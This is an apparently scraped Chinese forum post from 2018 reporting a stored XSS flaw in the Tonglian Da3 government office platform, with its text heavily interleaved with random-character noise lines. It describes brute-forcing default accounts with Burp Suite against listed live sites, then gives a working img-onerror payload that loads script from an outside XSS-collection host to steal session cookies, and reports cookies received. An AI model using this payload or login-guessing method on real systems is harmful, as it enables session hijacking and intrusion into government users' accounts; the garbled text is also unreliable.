+ |9 c6 q; k: G
) k8 F: Y( j- L0 a' f 同联Da3协同办公平台后台通用储存型xss漏洞
4 f0 m8 p) e* f; O5 T7 k
' c6 s9 `! p1 K7 c+ h " N; c! l5 Q y
平台简介:
& Q; l) P+ m& `, \5 ^; w
, ?; g7 t9 X" l; H2 S / C) I* s7 n5 E: i) G% T
3 ]- R% g7 m: U* G8 W
- A* M6 G$ Q; \( \! }* s / s5 `- R+ R. D. t$ ~* [) E
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 y. P$ _. ~& _6 ]0 y同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 k9 x# |1 _$ u8 F1 e% @& p
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
- ] S; T) l" {9 V8 H
1 o+ j+ H# x% M0 e1 t% q! {- n
8 s F$ ~3 K3 Y9 ~" [
6 A2 G8 ]' n- _/ Z/ {
A6 `( A& \- G; V
% n- r3 n$ r I 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
2 R) _0 e1 t/ ]8 Z: M3 ]$ w! J
$ B6 G" v* Y) f1 c: X1 H& b& t
3 \) ^& t! `3 q, H5 `- O
7 M7 f! O) s3 @( S; W. e
: A( c" m& F: R( j' A1 Q
1 _# m' I/ M2 ?8 b* _ http://1.1.1.1:7197/cap-aco/#(案例2-)
6 }4 Z8 u1 r0 y5 J
8 Z" v8 i% d( u( z* \9 T
' @; d7 C6 _5 ^3 q. y& [ http://www.XXOO.com (案例1-官网网站)' b# h {( R, i5 T x
7 x4 i( v0 n+ f) Z/ z2 k' C 5 \9 ?* r# ^ ~
漏洞详情:: }4 T( n! B6 u3 s& n
" k( q3 _- D9 L
" f+ Y" {2 L5 ]( [! ? A" l: C$ F
案例一、. D! ~& w& n4 |/ J& ^
0 Z( F; c1 ^7 b5 k. R1 D
& O, Y, x% B" H+ t) }7 Z, W 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
; d2 G, y$ n3 \6 k
: U' N* }( y: ?9 e" E
& w. Y$ q, G e) y" q- R) O/ \1 E; I 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
. _8 H- z/ e: ^& k0 D
2 t+ U$ ?) e( N/ b X/ z
) [; ~: f5 O n+ x6 B % h9 u; V: t, M) q( I& L
( D" ?4 M* l" {
6 u2 K w: h2 Z1 q 
. I+ i$ e: Z4 @+ y! Q
+ c" G; V S# m# E0 f$ b
) B; |7 n P' \8 _/ w. U: a
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ; X7 z+ ~, h# u! p: k |$ r
# |+ q: ~: g8 |3 E) G; F
$ m7 z) {' g' ~& Q ; `- N% x) C4 j K
5 G8 ^! c' d0 V
$ N* J+ i7 l) N 
+ }& j# m; }, V; M' g) E
7 I0 T) I6 C! D8 w$ Y1 Z7 i; @' b& }2 r + k4 a m. O; |7 |* Y& v
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 / `! ?$ C7 O/ P$ i
: d2 J3 b3 S, Q& n: N. O V* i D$ I: P. z; k; X4 c6 h$ h9 `
) P; h! v) K2 s: k
6 [2 ]" e* x8 }1 v) `2 F' o- q
/ ?2 q0 S6 z1 r6 Z
<img src=x7 ` {* P2 @# x8 h5 k) D
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 3 L) S2 ?7 x$ Y) l" }0 |+ _
- y8 `4 z% A; [5 R& z
. y5 g0 H) |9 w' y+ o5 O- s
) r( ~) F3 S8 z# w0 O Q/ R( n
& _. J0 ~! |. e3 u& c9 a: p+ O
0 t- g; D' t4 |" {2 d 然后发送,接收cookie如图:
$ p/ ]2 [ k( i$ X2 {
3 l' b( @( c' u" A, J + Q( [, B) |# A3 T4 p# U2 ]
/ @2 P* N; G% ?& u& w8 A$ Y
- W' C& X/ \7 P+ h3 a* Z$ ^
# i. H3 v* I0 t8 j' s
- ~& Y; p6 u) V+ V, z: V
- P: q6 t7 Q t# I. s! T, z
$ N+ M. R/ E; v( v - D4 C3 t; B+ v9 G+ R
8 k& b0 d& m% u, j* A: y% {4 F
: H6 A1 i0 A, Z; {6 y, o + u# q5 m+ @/ Q' x6 U: h3 S
& P R/ Z5 c6 M( ^3 P : p- z( p( r; M( y& L6 N0 c6 u
& Z+ U V( j: _
. D' p2 P+ p9 B4 @: m% U( j$ y) e ' F0 L" H0 C. S; a4 v0 B" D9 A- t
: o# y" F; o" L* {$ X9 z) O: b
8 k) c' q" ~0 {/ U
6 y0 t- M+ k# g+ U' { + N2 ^( b! M+ [: @
4 H' [( h8 d, I& i% O0 b3 T
& O1 U: d* e* b0 U 案例2、
+ l/ l: F: W) z# N8 U2 K. {3 D
8 a# g& j c; w. | 7 @; p4 n( Q% K6 E, p- \2 w+ ~
前面步骤都一样,下面看效果图: 7 A/ Q7 C R" a
2 n, Y( U( o/ _, `. I4 {
( E* i1 K J1 ]7 l2 |: ]6 P/ |& @ 
2 ?/ \0 G9 V6 N. z/ t& p8 v4 v
1 k% `7 ^( s; @/ S; l, l
! j& s2 W7 k( l" n' R6 I 
5 z6 k0 a( w3 o$ ?5 T% R; _
* U& l* R9 y; f
$ l% _6 ^0 q8 N4 g, V % T8 r0 O$ A# ~
+ l: M8 b( t( r4 t4 C , {* A, y* b6 ^) K
$ z4 c2 u+ e; O' p8 q; o
* S* u, K8 q3 a) u' L7 h7 ]; P
9 r+ |# @& L( D) v2 F( r 
$ w. C8 ?' Y+ J2 d) L6 x, h
3 B- N# [& s2 D$ F# y! l8 T
5 K7 J4 I% F- l# p6 s- X
1 P5 }8 v0 O- [( l* h% K$ y
' G% k* I, v& s3 u* {& b- ` 1 T7 M: D6 n( _% Y5 {! S- T
6 W) J& n5 O9 x, g" X0 o! N d
$ K$ u, b: z t6 o& X
- P3 j" |; h" Y1 R/ g+ \
3 a- u% |" }- m& K
0 \8 P" A% G4 i# {% f( ^3 A + a1 a0 ?4 I$ ~& |! h
" M I3 y# n+ v3 v
7 p- l; Y$ p4 r; E; y3 q1 ` 
发表于 2018-10-20 20:14:15
收藏
支持
反对